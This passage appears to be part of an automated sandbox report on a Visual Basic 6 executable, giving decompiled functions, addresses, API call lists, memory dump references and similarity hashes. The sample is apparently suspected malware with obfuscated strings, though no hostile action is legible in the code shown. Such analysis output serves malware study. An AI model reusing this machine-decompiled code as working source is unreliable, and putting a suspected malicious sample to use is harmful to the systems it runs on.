                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v140 = 0x410010;
                  					}
                  					_t78 =  &_v32;
                  					L004013CC();
                  					_v112 = _t78;
                  					_t82 =  *((intOrPtr*)( *_v112 + 0x120))(_v112,  &_v36, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
                  					asm("fclex");
                  					_v116 = _t82;
                  					if(_v116 >= 0) {
                  						_v144 = _v144 & 0x00000000;
                  					} else {
                  						_push(0x120);
                  						_push(0x40b06c);
                  						_push(_v112);
                  						_push(_v116);
                  						L004013D8();
                  						_v144 = _t82;
                  					}
                  					_v136 = _v36;
                  					_v36 = _v36 & 0x00000000;
                  					_v48 = _v136;
                  					_v56 = 9;
                  					if( *0x410010 != 0) {
                  						_v148 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v148 = 0x410010;
                  					}
                  					_t88 =  &_v40;
                  					L004013CC();
                  					_v120 = _t88;
                  					_t92 =  *((intOrPtr*)( *_v120 + 0x60))(_v120,  &_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x300))( *_v148));
                  					asm("fclex");
                  					_v124 = _t92;
                  					if(_v124 >= 0) {
                  						_v152 = _v152 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b05c);
                  						_push(_v120);
                  						_push(_v124);
                  						L004013D8();
                  						_v152 = _t92;
                  					}
                  					_v80 = _v108;
                  					_v88 = 3;
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(2);
                  					_push(L"IpXl81");
                  					_push(_v28);
                  					L0040136C();
                  					_push( &_v40);
                  					_t74 =  &_v32;
                  					_push(_t74);
                  					_push(2);
                  					L004013C6();
                  					L00401450();
                  				}
                  				_push(E0040EAA9);
                  				L004013D2();
                  				return _t74;
                  			}

































                  0x0040e861
                  0x0040e870
                  0x0040e87c
                  0x0040e884
                  0x0040e887
                  0x0040e88e
                  0x0040e89d
                  0x0040e8a0
                  0x0040e8a2
                  0x0040e8a4
                  0x0040e8ac
                  0x0040e8ad
                  0x0040e8b2
                  0x0040e8b5
                  0x0040e8b6
                  0x0040e8c6
                  0x0040e8cd
                  0x0040e8d2
                  0x0040e8d8
                  0x0040e8e5
                  0x0040e902
                  0x0040e8e7
                  0x0040e8e7
                  0x0040e8ec
                  0x0040e8f1
                  0x0040e8f6
                  0x0040e8f6
                  0x0040e926
                  0x0040e92a
                  0x0040e92f
                  0x0040e93e
                  0x0040e944
                  0x0040e946
                  0x0040e94d
                  0x0040e96c
                  0x0040e94f
                  0x0040e94f
                  0x0040e954
                  0x0040e959
                  0x0040e95c
                  0x0040e95f
                  0x0040e964
                  0x0040e964
                  0x0040e976
                  0x0040e97c
                  0x0040e986
                  0x0040e989
                  0x0040e997
                  0x0040e9b4
                  0x0040e999
                  0x0040e999
                  0x0040e99e
                  0x0040e9a3
                  0x0040e9a8
                  0x0040e9a8
                  0x0040e9d8
                  0x0040e9dc
                  0x0040e9e1
                  0x0040e9f0
                  0x0040e9f3
                  0x0040e9f5
                  0x0040e9fc
                  0x0040ea18
                  0x0040e9fe
                  0x0040e9fe
                  0x0040ea00
                  0x0040ea05
                  0x0040ea08
                  0x0040ea0b
                  0x0040ea10
                  0x0040ea10
                  0x0040ea22
                  0x0040ea25
                  0x0040ea2c
                  0x0040ea2f
                  0x0040ea39
                  0x0040ea3a
                  0x0040ea3b
                  0x0040ea3c
                  0x0040ea3d
                  0x0040ea40
                  0x0040ea4a
                  0x0040ea4b
                  0x0040ea4c
                  0x0040ea4d
                  0x0040ea4e
                  0x0040ea50
                  0x0040ea55
                  0x0040ea58
                  0x0040ea63
                  0x0040ea64
                  0x0040ea67
                  0x0040ea68
                  0x0040ea6a
                  0x0040ea75
                  0x0040ea75
                  0x0040ea7a
                  0x0040eaa3
                  0x0040eaa8

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E87C
                  • #538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8AD
                  • #557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8B6
                  • __vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8CD
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8F1
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E92A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000120), ref: 0040E95F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040E9A3
                  • __vbaObjSet.MSVBVM60(0000000B,00000000), ref: 0040E9DC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA0B
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA2F
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA40
                  • __vbaLateMemCall.MSVBVM60(?,IpXl81,00000002), ref: 0040EA58
                  • __vbaFreeObjList.MSVBVM60(00000002,?,0000000B), ref: 0040EA6A
                  • __vbaFreeVar.MSVBVM60 ref: 0040EA75
                  • __vbaFreeObj.MSVBVM60(0040EAA9,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EAA3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Chkstk$CheckHresultNew2$#538#557CallLateList
                  • String ID: IpXl81$Pt
                  • API String ID: 2856081814-2191937191
                  • Opcode ID: ee265e54bdda5ff4e069fd9a53067b64a4abcc3975de78f6b81072115670497a
                  • Instruction ID: 02b73d5a201f6b754b62a1c2fd42f9a7f1313c4de20a9b19c00eec995f72fbea
                  • Opcode Fuzzy Hash: ee265e54bdda5ff4e069fd9a53067b64a4abcc3975de78f6b81072115670497a
                  • Instruction Fuzzy Hash: ED512B74E00208DFDB10DFA1C846BDEBBB4BF08704F1044AAF505BB2A2D7B959959F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E0040EC36(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v32;
                  				signed int _v36;
                  				char _v40;
                  				long long _v48;
                  				char _v56;
                  				intOrPtr _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				char _v88;
                  				intOrPtr _v96;
                  				char _v104;
                  				intOrPtr _v112;
                  				char _v120;
                  				intOrPtr _v128;
                  				char _v136;
                  				intOrPtr _v144;
                  				char _v152;
                  				void* _v252;
                  				signed int _v256;
                  				signed int _v268;
                  				intOrPtr* _v272;
                  				signed int _v276;
                  				signed int _t74;
                  				char* _t78;
                  				char* _t82;
                  				signed int _t86;
                  				void* _t116;
                  				void* _t118;
                  				intOrPtr _t119;
                  
                  				_t119 = _t118 - 0xc;
                  				 *[fs:0x0] = _t119;
                  				L004012A0();
                  				_v16 = _t119;
                  				_v12 = 0x401268;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                  				_v48 =  *0x401260;
                  				_v56 = 5;
                  				_t74 =  &_v56;
                  				_push(_t74);
                  				L00401348();
                  				L0040145C();
                  				_push(_t74);
                  				_push(L"Double");
                  				L00401360();
                  				asm("sbb eax, eax");
                  				_v252 =  ~( ~( ~_t74));
                  				L00401462();
                  				L00401450();
                  				_t78 = _v252;
                  				if(_t78 != 0) {
                  					_v144 = 0x80020004;
                  					_v152 = 0xa;
                  					_v128 = 0x80020004;
                  					_v136 = 0xa;
                  					_v112 = 0x80020004;
                  					_v120 = 0xa;
                  					_v96 = 0x80020004;
                  					_v104 = 0xa;
                  					_v80 = 0x80020004;
                  					_v88 = 0xa;
                  					_v64 = 0x80020004;
                  					_v72 = 0xa;
                  					if( *0x410010 != 0) {
                  						_v272 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v272 = 0x410010;
                  					}
                  					_t82 =  &_v40;
                  					L004013CC();
                  					_v252 = _t82;
                  					_t86 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x2fc))( *_v272));
                  					asm("fclex");
                  					_v256 = _t86;
                  					if(_v256 >= 0) {
                  						_v276 = _v276 & 0x00000000;
                  					} else {
                  						_push(0x50);
                  						_push(0x40b05c);
                  						_push(_v252);
                  						_push(_v256);
                  						L004013D8();
                  						_v276 = _t86;
                  					}
                  					_v268 = _v36;
                  					_v36 = _v36 & 0x00000000;
                  					_v48 = _v268;
                  					_v56 = 8;
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push( &_v120);
                  					_push( &_v104);
                  					_push( &_v88);
                  					_push( &_v72);
                  					_push( &_v56);
                  					L00401342();
                  					L0040145C();
                  					L004013D2();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push( &_v120);
                  					_push( &_v104);
                  					_push( &_v88);
                  					_push( &_v72);
                  					_t78 =  &_v56;
                  					_push(_t78);
                  					_push(7);
                  					L00401432();
                  				}
                  				asm("wait");
                  				_push(E0040EEA5);
                  				L00401462();
                  				return _t78;
                  			}



































                  0x0040ec39
                  0x0040ec48
                  0x0040ec54
                  0x0040ec5c
                  0x0040ec5f
                  0x0040ec66
                  0x0040ec75
                  0x0040ec7e
                  0x0040ec81
                  0x0040ec88
                  0x0040ec8b
                  0x0040ec8c
                  0x0040ec96
                  0x0040ec9b
                  0x0040ec9c
                  0x0040eca1
                  0x0040eca8
                  0x0040ecae
                  0x0040ecb8
                  0x0040ecc0
                  0x0040ecc5
                  0x0040ecce
                  0x0040ecd4
                  0x0040ecde
                  0x0040ece8
                  0x0040ecef
                  0x0040ecf9
                  0x0040ed00
                  0x0040ed07
                  0x0040ed0e
                  0x0040ed15
                  0x0040ed1c
                  0x0040ed23
                  0x0040ed2a
                  0x0040ed38
                  0x0040ed55
                  0x0040ed3a
                  0x0040ed3a
                  0x0040ed3f
                  0x0040ed44
                  0x0040ed49
                  0x0040ed49
                  0x0040ed79
                  0x0040ed7d
                  0x0040ed82
                  0x0040ed9a
                  0x0040ed9d
                  0x0040ed9f
                  0x0040edac
                  0x0040edce
                  0x0040edae
                  0x0040edae
                  0x0040edb0
                  0x0040edb5
                  0x0040edbb
                  0x0040edc1
                  0x0040edc6
                  0x0040edc6
                  0x0040edd8
                  0x0040edde
                  0x0040ede8
                  0x0040edeb
                  0x0040edf8
                  0x0040edff
                  0x0040ee03
                  0x0040ee07
                  0x0040ee0b
                  0x0040ee0f
                  0x0040ee13
                  0x0040ee14
                  0x0040ee1e
                  0x0040ee26
                  0x0040ee31
                  0x0040ee38
                  0x0040ee3c
                  0x0040ee40
                  0x0040ee44
                  0x0040ee48
                  0x0040ee49
                  0x0040ee4c
                  0x0040ee4d
                  0x0040ee4f
                  0x0040ee54
                  0x0040ee57
                  0x0040ee58
                  0x0040ee9f
                  0x0040eea4

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EC54
                  • #591.MSVBVM60(00000005), ref: 0040EC8C
                  • __vbaStrMove.MSVBVM60(00000005), ref: 0040EC96
                  • __vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 0040ECA1
                  • __vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 0040ECB8
                  • __vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 0040ECC0
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040ED44
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ED7D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000050), ref: 0040EDC1
                  • #596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE14
                  • __vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE1E
                  • __vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE26
                  • __vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE4F
                  • __vbaFreeStr.MSVBVM60(0040EEA5,Double,00000000,00000005), ref: 0040EE9F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Move$#591#596CheckChkstkHresultListNew2
                  • String ID: Double$Pt
                  • API String ID: 3707479433-1435507758
                  • Opcode ID: 65c0c2689de41ec36c7da5d5632dba7a04ed8fddff8a8b13d506702fd459a7d4
                  • Instruction ID: e123f40181fab5efb77983bbf84d1d60078e622ed8c2ac08e50f37e13e11cf74
                  • Opcode Fuzzy Hash: 65c0c2689de41ec36c7da5d5632dba7a04ed8fddff8a8b13d506702fd459a7d4
                  • Instruction Fuzzy Hash: 625108B194021DDBDB21DF91D985BDEB7B8FF08304F2081AAE109B71A1DBB85A84CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E0040E1A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a40, void* _a48) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v24;
                  				void* _v40;
                  				void* _v56;
                  				void* _v60;
                  				char _v76;
                  				char* _v100;
                  				char _v108;
                  				intOrPtr _v116;
                  				char _v124;
                  				signed int _v128;
                  				signed int _v136;
                  				signed int _t42;
                  				signed int _t43;
                  				intOrPtr _t65;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t65;
                  				_push(0x74);
                  				L004012A0();
                  				_v12 = _t65;
                  				_v8 = 0x4011e8;
                  				L004013E4();
                  				L00401420();
                  				L004013E4();
                  				L00401420();
                  				_v100 =  &_v24;
                  				_v108 = 0x4008;
                  				_push(1);
                  				_push( &_v108);
                  				_push( &_v76);
                  				L0040138A();
                  				_v116 = 0x40b108;
                  				_v124 = 0x8008;
                  				_push( &_v76);
                  				_t42 =  &_v124;
                  				_push(_t42);
                  				L004013F0();
                  				_v128 = _t42;
                  				L00401450();
                  				_t43 = _v128;
                  				if(_t43 != 0) {
                  					_t43 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                  					_v128 = _t43;
                  					if(_v128 >= 0) {
                  						_v136 = _v136 & 0x00000000;
                  					} else {
                  						_push(0x718);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v128);
                  						L004013D8();
                  						_v136 = _t43;
                  					}
                  				}
                  				_push(E0040E2C1);
                  				L00401462();
                  				L00401450();
                  				L00401450();
                  				L00401462();
                  				return _t43;
                  			}



















                  0x0040e1aa
                  0x0040e1b5
                  0x0040e1b6
                  0x0040e1bd
                  0x0040e1c0
                  0x0040e1c8
                  0x0040e1cb
                  0x0040e1d8
                  0x0040e1e3
                  0x0040e1ee
                  0x0040e1fb
                  0x0040e203
                  0x0040e206
                  0x0040e20d
                  0x0040e212
                  0x0040e216
                  0x0040e217
                  0x0040e21c
                  0x0040e223
                  0x0040e22d
                  0x0040e22e
                  0x0040e231
                  0x0040e232
                  0x0040e237
                  0x0040e23e
                  0x0040e243
                  0x0040e249
                  0x0040e253
                  0x0040e259
                  0x0040e260
                  0x0040e27f
                  0x0040e262
                  0x0040e262
                  0x0040e267
                  0x0040e26c
                  0x0040e26f
                  0x0040e272
                  0x0040e277
                  0x0040e277
                  0x0040e260
                  0x0040e286
                  0x0040e2a3
                  0x0040e2ab
                  0x0040e2b3
                  0x0040e2bb
                  0x0040e2c0

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E1C0
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1D8
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1E3
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1EE
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1FB
                  • #619.MSVBVM60(?,00004008,00000001), ref: 0040E217
                  • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E232
                  • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E23E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AD54,00000718), ref: 0040E272
                  • __vbaFreeStr.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2A3
                  • __vbaFreeVar.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2AB
                  • __vbaFreeVar.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2B3
                  • __vbaFreeStr.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Copy$#619CheckChkstkHresult
                  • String ID: ABC
                  • API String ID: 4030740960-2743272264
                  • Opcode ID: 8455290b6a2ce3b49f68dd43f756e48581f6039460372c5a1c969970c51724a0
                  • Instruction ID: 29939df5dada041200be1e29192ee8797351772dc35cb9b831b840ca295006ee
                  • Opcode Fuzzy Hash: 8455290b6a2ce3b49f68dd43f756e48581f6039460372c5a1c969970c51724a0
                  • Instruction Fuzzy Hash: EF31E670800209ABDB10EFA2C986ADDBBB8EF04748F50446EF505B71A2DB786A45CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 47%
                  			E0040E2D4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                  				intOrPtr _v12;
                  				long long* _v16;
                  				char _v44;
                  				char _v48;
                  				intOrPtr _v56;
                  				char _v64;
                  				intOrPtr _v72;
                  				char _v80;
                  				void* _v116;
                  				signed int _v120;
                  				signed int _v124;
                  				signed int _v136;
                  				intOrPtr* _v140;
                  				signed int _v144;
                  				signed char _v148;
                  				signed long long _v156;
                  				signed long long _v160;
                  				signed int _v164;
                  				signed int* _t60;
                  				char* _t67;
                  				char* _t71;
                  				signed int _t75;
                  				signed char _t76;
                  				signed int _t80;
                  				intOrPtr _t86;
                  				void* _t92;
                  				long long* _t93;
                  				void* _t94;
                  				intOrPtr* _t95;
                  				signed long long _t98;
                  				signed long long _t100;
                  
                  				_t93 = _t92 - 0xc;
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t93;
                  				L004012A0();
                  				_v16 = _t93;
                  				_v12 = 0x401210;
                  				_t60 = _a8;
                  				 *_t60 =  *_t60 & 0x00000000;
                  				_v72 = 0x80020004;
                  				_v80 = 0xa;
                  				_v56 = 0x80020004;
                  				_v64 = 0xa;
                  				_push( &_v80);
                  				_push( &_v64);
                  				_t98 =  *0x401208;
                  				 *_t93 = _t98;
                  				asm("fld1");
                  				 *_t93 = _t98;
                  				asm("fld1");
                  				 *_t93 = _t98;
                  				L0040137E();
                  				L00401384();
                  				asm("fcomp qword [0x401200]");
                  				asm("fnstsw ax");
                  				asm("sahf");
                  				if( *_t60 == 0) {
                  					_v136 = _v136 & 0x00000000;
                  				} else {
                  					_v136 = 1;
                  				}
                  				_v116 =  ~_v136;
                  				_push( &_v80);
                  				_push( &_v64);
                  				_push(2);
                  				L00401432();
                  				_t94 = _t93 + 0xc;
                  				_t67 = _v116;
                  				if(_t67 == 0) {
                  					L16:
                  					asm("wait");
                  					_push(E0040E510);
                  					return _t67;
                  				} else {
                  					if( *0x410010 != 0) {
                  						_v140 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v140 = 0x410010;
                  					}
                  					_t86 =  *((intOrPtr*)( *_v140));
                  					_t71 =  &_v44;
                  					L004013CC();
                  					_v116 = _t71;
                  					_t75 =  *((intOrPtr*)( *_v116 + 0x58))(_v116,  &_v48, _t71,  *((intOrPtr*)(_t86 + 0x31c))( *_v140));
                  					asm("fclex");
                  					_v120 = _t75;
                  					if(_v120 >= 0) {
                  						_v144 = _v144 & 0x00000000;
                  					} else {
                  						_push(0x58);
                  						_push(0x40b07c);
                  						_push(_v116);
                  						_push(_v120);
                  						L004013D8();
                  						_v144 = _t75;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push(_v48);
                  					_t76 =  &_v64;
                  					_push(_t76);
                  					L004013BA();
                  					_t95 = _t94 + 0x10;
                  					_push(_t76);
                  					L004013B4();
                  					_v148 = _t76;
                  					asm("fild dword [ebp-0x90]");
                  					_v156 = _t98;
                  					_t100 = _v156 *  *0x4011f8;
                  					asm("fnstsw ax");
                  					if((_t76 & 0x0000000d) != 0) {
                  						goto L1;
                  					} else {
                  						_v160 = _t100;
                  						 *_t95 = _v160;
                  						_t80 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t86);
                  						asm("fclex");
                  						_v124 = _t80;
                  						if(_v124 >= 0) {
                  							_v164 = _v164 & 0x00000000;
                  						} else {
                  							_push(0x84);
                  							_push(0x40ad24);
                  							_push(_a4);
                  							_push(_v124);
                  							L004013D8();
                  							_v164 = _t80;
                  						}
                  						_push( &_v48);
                  						_t67 =  &_v44;
                  						_push(_t67);
                  						_push(2);
                  						L004013C6();
                  						L00401450();
                  						goto L16;
                  					}
                  				}
                  				L1:
                  				return __imp____vbaFPException();
                  			}


































                  0x0040e2d7
                  0x0040e2da
                  0x0040e2e5
                  0x0040e2e6
                  0x0040e2f2
                  0x0040e2fa
                  0x0040e2fd
                  0x0040e304
                  0x0040e307
                  0x0040e30a
                  0x0040e311
                  0x0040e318
                  0x0040e31f
                  0x0040e329
                  0x0040e32d
                  0x0040e32e
                  0x0040e336
                  0x0040e339
                  0x0040e33d
                  0x0040e340
                  0x0040e344
                  0x0040e347
                  0x0040e34c
                  0x0040e351
                  0x0040e357
                  0x0040e359
                  0x0040e35a
                  0x0040e368
                  0x0040e35c
                  0x0040e35c
                  0x0040e35c
                  0x0040e377
                  0x0040e37e
                  0x0040e382
                  0x0040e383
                  0x0040e385
                  0x0040e38a
                  0x0040e38d
                  0x0040e393
                  0x0040e4d0
                  0x0040e4d0
                  0x0040e4d1
                  0x00000000
                  0x0040e399
                  0x0040e3a0
                  0x0040e3bd
                  0x0040e3a2
                  0x0040e3a2
                  0x0040e3a7
                  0x0040e3ac
                  0x0040e3b1
                  0x0040e3b1
                  0x0040e3d7
                  0x0040e3e1
                  0x0040e3e5
                  0x0040e3ea
                  0x0040e3f9
                  0x0040e3fc
                  0x0040e3fe
                  0x0040e405
                  0x0040e421
                  0x0040e407
                  0x0040e407
                  0x0040e409
                  0x0040e40e
                  0x0040e411
                  0x0040e414
                  0x0040e419
                  0x0040e419
                  0x0040e428
                  0x0040e42a
                  0x0040e42c
                  0x0040e42f
                  0x0040e432
                  0x0040e433
                  0x0040e438
                  0x0040e43b
                  0x0040e43c
                  0x0040e441
                  0x0040e447
                  0x0040e44d
                  0x0040e459
                  0x0040e45f
                  0x0040e463
                  0x00000000
                  0x0040e469
                  0x0040e469
                  0x0040e476
                  0x0040e481
                  0x0040e487
                  0x0040e489
                  0x0040e490
                  0x0040e4af
                  0x0040e492
                  0x0040e492
                  0x0040e497
                  0x0040e49c
                  0x0040e49f
                  0x0040e4a2
                  0x0040e4a7
                  0x0040e4a7
                  0x0040e4b9
                  0x0040e4ba
                  0x0040e4bd
                  0x0040e4be
                  0x0040e4c0
                  0x0040e4cb
                  0x00000000
                  0x0040e4cb
                  0x0040e463
                  0x004012ac
                  0x004012ac

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E2F2
                  • #677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E347
                  • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E34C
                  • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040E385
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,004012A6), ref: 0040E3AC
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3E5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000058), ref: 0040E414
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E433
                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,004012A6), ref: 0040E43C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401210,0040AD24,00000084), ref: 0040E4A2
                  • __vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 0040E4C0
                  • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004012A6), ref: 0040E4CB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$CheckHresultList$#677CallChkstkLateNew2
                  • String ID: Pt
                  • API String ID: 1795533351-3089937733
                  • Opcode ID: 86c05a835eb629afac8e2437cfea9062a77e1098bdfe7967f973c3a899115a02
                  • Instruction ID: 35a1c28e5c63373f501b984e4443b7a9a9eac339cb8e691ffe0c04b58caaec1e
                  • Opcode Fuzzy Hash: 86c05a835eb629afac8e2437cfea9062a77e1098bdfe7967f973c3a899115a02
                  • Instruction Fuzzy Hash: 11514970900208EFDB20DFA1CC45BADBBB8FB08704F1085AAF545B72A2DB785994DF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E0040EECC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* _v36;
                  				void* _v52;
                  				char _v56;
                  				intOrPtr _v64;
                  				intOrPtr _v72;
                  				intOrPtr* _v76;
                  				signed int _v80;
                  				intOrPtr* _v88;
                  				signed int _v92;
                  				char* _t35;
                  				signed int _t39;
                  				intOrPtr _t58;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t58;
                  				_push(0x48);
                  				L004012A0();
                  				_v12 = _t58;
                  				_v8 = 0x401278;
                  				L004013E4();
                  				L004013E4();
                  				if( *0x410010 != 0) {
                  					_v88 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v88 = 0x410010;
                  				}
                  				_t35 =  &_v56;
                  				L004013CC();
                  				_v76 = _t35;
                  				_v64 = 1;
                  				_v72 = 2;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t39 =  *((intOrPtr*)( *_v76 + 0x17c))(_v76, 0x10, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x314))( *_v88));
                  				asm("fclex");
                  				_v80 = _t39;
                  				if(_v80 >= 0) {
                  					_v92 = _v92 & 0x00000000;
                  				} else {
                  					_push(0x17c);
                  					_push(0x40b06c);
                  					_push(_v76);
                  					_push(_v80);
                  					L004013D8();
                  					_v92 = _t39;
                  				}
                  				L004013D2();
                  				_push(E0040EFD6);
                  				L00401450();
                  				L00401450();
                  				return _t39;
                  			}

















                  0x0040eed1
                  0x0040eedc
                  0x0040eedd
                  0x0040eee4
                  0x0040eee7
                  0x0040eeef
                  0x0040eef2
                  0x0040eeff
                  0x0040ef0a
                  0x0040ef16
                  0x0040ef30
                  0x0040ef18
                  0x0040ef18
                  0x0040ef1d
                  0x0040ef22
                  0x0040ef27
                  0x0040ef27
                  0x0040ef4b
                  0x0040ef4f
                  0x0040ef54
                  0x0040ef57
                  0x0040ef5e
                  0x0040ef68
                  0x0040ef72
                  0x0040ef73
                  0x0040ef74
                  0x0040ef75
                  0x0040ef7e
                  0x0040ef84
                  0x0040ef86
                  0x0040ef8d
                  0x0040efa9
                  0x0040ef8f
